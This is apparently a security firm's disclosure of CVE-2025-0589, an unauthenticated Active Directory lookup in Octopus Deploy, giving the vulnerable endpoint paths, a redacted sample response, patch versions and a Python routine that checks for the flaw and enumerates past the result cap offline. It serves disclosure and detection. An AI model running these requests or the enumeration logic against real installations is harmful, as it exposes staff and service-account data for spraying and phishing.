
Unauthenticated Access to Active Directory via Octopus Deploy (CVE-2025-0589)

Daniel Andrew, Head of Security

TL;DR 

  • Vulnerability: CVE-2025-0589 allows an unauthenticated attacker to query a connected Active Directory environment through Octopus Deploy's directory search API.
  • Impact: Data exposed includes names of personnel, email addresses, User Principal Names, sAMAccountNames and display names (the "email", "upn", "sam" and "dn" claims in the response). This included data for service accounts.
  • Who’s Affected: On-premises Octopus Deploy installations that use Active Directory for authentication, in versions prior to 2024.4.7065 (or prior to 2024.3.13071 on the earlier 2024.3 feature stream).
  • Patch: Upgrade to 2024.4.7065 or later, or to 2024.3.13071 or later if you remain on the 2024.3 stream. Note that 2024.3.13071 alone is not sufficient for the 2024.4 stream.
  • Disclosure & Bounty: Octopus patched quickly and paid a $3,000 bounty
  • Stay secure with Intruder: Intruder can scan your Octopus Deploy instances for this vulnerability. 

APIs with Broken Authentication

In late 2024, Intruder’s security team was working on some research into APIs which expose endpoints that are missing authentication. The OWASP Top 10 for APIs lists Broken Authentication as number two, so we decided to look into some targets on Bug Bounty programs and see how prevalent these bugs really are. 

API2:2023 Broken Authentication bugs are simple to understand, both for attackers and defenders, and you could teach a new pentester to detect them manually and start testing in less than a day. The basic premise is that the application server fails to perform the authentication step on certain endpoints, so requests succeed with no session token or API key whatsoever. Though these weaknesses are easy to discover from the outside, they are much harder to catch during a code review, because the defect is an absent check rather than a wrong line of code, which is one key reason these simple bugs remain so prevalent.

We developed tooling that can detect these weaknesses at scale, and our results included this bug in Octopus Deploy which exposes sensitive Active Directory information without authentication. We plan to release details of our tooling and process at an upcoming conference in 2025, so follow us to stay tuned!

What is Octopus Deploy? 

Octopus Deploy is a popular deployment automation tool used to manage releases, handle infrastructure changes, and orchestrate continuous delivery (CD) pipelines. It integrates with multiple DevOps stacks and can connect to Active Directory for centralized identity. 

Vulnerability Details 

We found two API endpoints in vulnerable versions of Octopus Deploy that returned responses without any authentication:

GET /api/externalusers/directoryServices?partialName=<Query>
GET /api/externalgroups/directoryServices?partialName=<Query>

This part of the API is intended for administrators who search Active Directory to assign roles or add users. On vulnerable versions no authentication check was enforced on these endpoints, and a bare GET request with a query in the “partialName” parameter returned a JSON blob listing email addresses, staff names, sAMAccountNames and User Principal Names (UPNs) from Active Directory. Note that the "dn" claim in the response carries the account's display name rather than an LDAP distinguished name, as the "Gary Ge..." entry in the sample below shows.

The endpoints also accepted a wildcard search. Responses are capped at 1000 records, but the cap is not a meaningful control: an attacker can recover the full directory by iterating through partial names (for example, one prefix at a time) and collecting each batch of results.

Below is a sample of the returned data including emails, names, and UPNs:

HTTP/2 200 OK
[...]

{
  "Identities": [
    {
      "IdentityProviderName": "Active Directory",
      "Claims": {
        "email": {
          "Value": "operator@********.***",
          "IsIdentifyingClaim": false
        },
        "upn": {
          "Value": "operator@********.***",
          "IsIdentifyingClaim": true
        },
        "sam": {
          "Value": "Operator",
          "IsIdentifyingClaim": true
        },
        "dn": {
          "Value": "Operator",
          "IsIdentifyingClaim": false
        }
      }
    },
    {
      "IdentityProviderName": "Active Directory",
      "Claims": {
        "email": {
          "Value": "gge******@**********.onmicrosoft.com",
          "IsIdentifyingClaim": false
        },
        "upn": {
          "Value": "gge******@**********.onmicrosoft.com",
          "IsIdentifyingClaim": true
        },
        "sam": {
          "Value": "gge*******",
          "IsIdentifyingClaim": true
        },
        "dn": {
          "Value": "Gary Ge*******",
          "IsIdentifyingClaim": false
        }
      }
    },
    {
      "IdentityProviderName": "Active Directory",
      "Claims": {
        "email": {
          "Value": "null",
          "IsIdentifyingClaim": false
        },
        "upn": {
          "Value": "f*******_ldap@*******.net",
          "IsIdentifyingClaim": true
        },
        "sam": {
          "Value": "f*******_ldap",
          "IsIdentifyingClaim": true
        },
        "dn": {
          "Value": "F*******_LDAP",
          "IsIdentifyingClaim": false
        }
      }
    }
  ]
}
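
The unauthenticated check and the partial-name iteration described above, as an added example that is not part of the original post or of Octopus Deploy's own code. It is written in Python and runs offline against constructed data. Three things in it are assumptions not stated on the page: that the search matches on a prefix of the account name (the test double below uses prefix matching so the cap-bypass logic can be exercised), that a lower-case alphanumeric alphabet covers the account names, and that a patched server answers the anonymous request with 401 or 403. The response shape parsed by extract_claims is the one in the sample above; the values are made up.

```python
"""Offline model of an unauthenticated check for CVE-2025-0589 and of why the
1000-record response cap does not stop full enumeration. Added example, not
Octopus Deploy code. All sample data below is constructed."""
import json
from typing import Callable, Iterable

# The two endpoints named in the advisory; a check sends an unauthenticated GET to each.
VULN_PATHS = (
    "/api/externalusers/directoryServices?partialName=a",
    "/api/externalgroups/directoryServices?partialName=a",
)
RESULT_CAP = 1000                                   # per-response limit stated in the post
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"   # assumed to cover the account names


def classify_response(status: int, body: str) -> str:
    """Classify the reply to an unauthenticated GET on one of VULN_PATHS.

    Assumption: a patched server rejects the request with 401/403 before it
    touches the directory. A 200 carrying an "Identities" list means the
    directory was queried on behalf of an anonymous caller.
    """
    if status in (401, 403):
        return "patched"
    if status != 200:
        return "unknown"
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "unknown"
    if isinstance(data, dict) and isinstance(data.get("Identities"), list):
        return "vulnerable"
    return "unknown"


def extract_claims(body: str) -> list[dict]:
    """Flatten Identities[].Claims.{upn,sam,email,dn}.Value into one row per account."""
    rows = []
    for ident in json.loads(body).get("Identities", []):
        claims = ident.get("Claims", {})
        rows.append({k: claims.get(k, {}).get("Value") for k in ("upn", "sam", "email", "dn")})
    return rows


def enumerate_by_prefix(search: Callable[[str], list[str]], prefix: str = "",
                        cap: int = RESULT_CAP, alphabet: str = ALPHABET) -> set[str]:
    """Recover every account behind a capped search by expanding the prefix.

    If a query returns fewer than `cap` records the answer is complete for that
    prefix. If it returns exactly `cap`, records were cut off, so the query is
    repeated for prefix + c over the alphabet. Names using characters outside
    `alphabet` can be missed; the cap itself hides nothing.
    """
    results = search(prefix)
    found = set(results)
    if len(results) >= cap:
        for c in alphabet:
            found |= enumerate_by_prefix(search, prefix + c, cap, alphabet)
    return found


def fake_directory_search(accounts: Iterable[str], cap: int = RESULT_CAP) -> Callable[[str], list[str]]:
    """Test double for the endpoint: prefix match on the account name, truncated at `cap`.

    The real endpoint's match semantics are not documented on the page; prefix
    matching is an assumption made so the cap-bypass logic can run offline.
    """
    ordered = sorted(accounts)

    def search(partial_name: str) -> list[str]:
        return [a for a in ordered if a.startswith(partial_name)][:cap]

    return search


# Constructed response in the shape shown in the advisory (values are made up).
SAMPLE_BODY = json.dumps({"Identities": [{
    "IdentityProviderName": "Active Directory",
    "Claims": {
        "email": {"Value": "operator@example.test", "IsIdentifyingClaim": False},
        "upn":   {"Value": "operator@example.test", "IsIdentifyingClaim": True},
        "sam":   {"Value": "Operator", "IsIdentifyingClaim": True},
        "dn":    {"Value": "Operator", "IsIdentifyingClaim": False},
    }}]})


if __name__ == "__main__":
    print(classify_response(200, SAMPLE_BODY), extract_claims(SAMPLE_BODY))
    # 1502 constructed accounts behind a 1000-record cap: a single wildcard
    # query sees 1000 of them, prefix expansion sees all of them.
    directory = [f"user{i:04d}" for i in range(1500)] + ["operator", "svc_ldap"]
    search = fake_directory_search(directory)
    print(len(search("")), len(enumerate_by_prefix(search)))
```

In a real scan only classify_response is needed: issue the GET with no cookie or API key and treat a 200 with an "Identities" list as a positive. The recursion is there to make the point in the text concrete: a result cap bounds one response, not the total an attacker can collect, so it should never be mistaken for an access control.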

As you can see, the bug is trivial to exploit and could be found by a beginner. A natural assumption might be that such bugs are rare, but some of the bugs we found during this project had sat in applications for years undetected, even though the targets were listed on public bug bounty programs. This implies that there is a lot of unexplored attack surface out there, and plenty of low-hanging fruit still to be picked. More on this in a later post.

Impact 

An unauthenticated attacker can enumerate domain account details and, with a wildcard search, harvest a large number of account records. Until the fix is deployed, any request to the two endpoints above that carries no session cookie or API key should be treated as likely enumeration activity.

Armed with a list of Active Directory users, password spraying attacks can be mounted against thousands of accounts to find the few that use weak passwords. Phishing can also be targeted using real information about employees and their job roles, making it more convincing.

Although impact here is limited to basic information of staff members and other AD accounts, Active Directory information can still be a goldmine for attackers targeting your organization.

Organizations that connect their applications to AD typically use SSO throughout their estate, so if an attacker gets hold of just one user’s credentials, they could gain access to a wide range of services and be able to pivot into your network from there.

Stay Ahead of Emerging Threats

If you’re a Premium customer, we’ve got you covered - our active checks can detect this vulnerability in your environment. Looking to learn more? Chat with us about Premium or keep up with our latest security insights on Intel - our free vulnerability intelligence platform.

Timeline 

  • Dec 3, 2024: Vulnerability submitted to Octopus 
  • Dec 5, 2024: Triaged 
  • Dec 20, 2024: Octopus awarded $3,000 
  • Jan 14, 2025: Fix Released 
  • Jan 23, 2025: Advisory Published 
